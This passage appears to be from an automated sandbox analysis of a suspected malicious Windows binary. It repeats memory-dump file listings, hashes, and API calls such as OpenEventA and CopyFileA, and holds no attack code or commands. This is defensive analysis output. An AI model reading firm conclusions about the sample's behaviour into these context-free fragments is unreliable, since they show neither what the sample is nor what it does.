                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: 0$ 0
                                                                                                                                                                        • API String ID: 1304948518-2612948726
                                                                                                                                                                        • Opcode ID: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
                                                                                                                                                                        • Instruction ID: de3a1f93126c12deb6ed219e4da2e682fdb512e8e31929a1438dbe72cb210f2e
                                                                                                                                                                        • Opcode Fuzzy Hash: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F316D76B000509FCB45DF9CDCE0EDD73F1AF89704B0801B9E50AE3361EA70AA198B5A
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0043D262
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EventOpen
                                                                                                                                                                        • String ID: -E~$z0_
                                                                                                                                                                        • API String ID: 3658969616-3497079166
                                                                                                                                                                        • Opcode ID: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
                                                                                                                                                                        • Instruction ID: 4c960738fd572624f98c33cf1521ed59ac4ed7dc924c0bf984625c0e848ba6ca
                                                                                                                                                                        • Opcode Fuzzy Hash: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A216F727012149FC794DF9DDC91FA973B9AF88604B0441BDE809D3351EEB0AE898B5A
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: 0$ 0
                                                                                                                                                                        • API String ID: 1304948518-2612948726
                                                                                                                                                                        • Opcode ID: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                        • Instruction ID: 46ca0ec3ac5e7fe645135cbb6742112b101b88f065de0e8023397726ea1268d6
                                                                                                                                                                        • Opcode Fuzzy Hash: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                        • Instruction Fuzzy Hash: F4018C3AB40100AFD744DF68DD91E4833E69BCA200B1906B9ED05D33A1E5B0AC458B56
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Network), ref: 0041ED6E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 0$Network
                                                                                                                                                                        • API String ID: 0-350251746
                                                                                                                                                                        • Opcode ID: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                        • Instruction ID: f80f0783777fa5cc836e735bdae024c9e7f2125abd3eb6355b1fadc9e12c604f
                                                                                                                                                                        • Opcode Fuzzy Hash: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                        • Instruction Fuzzy Hash: F4E04F7960020ADFC708DF24DEA4994B3BAFFC6248B094564DD099B235E7B1BC46CB55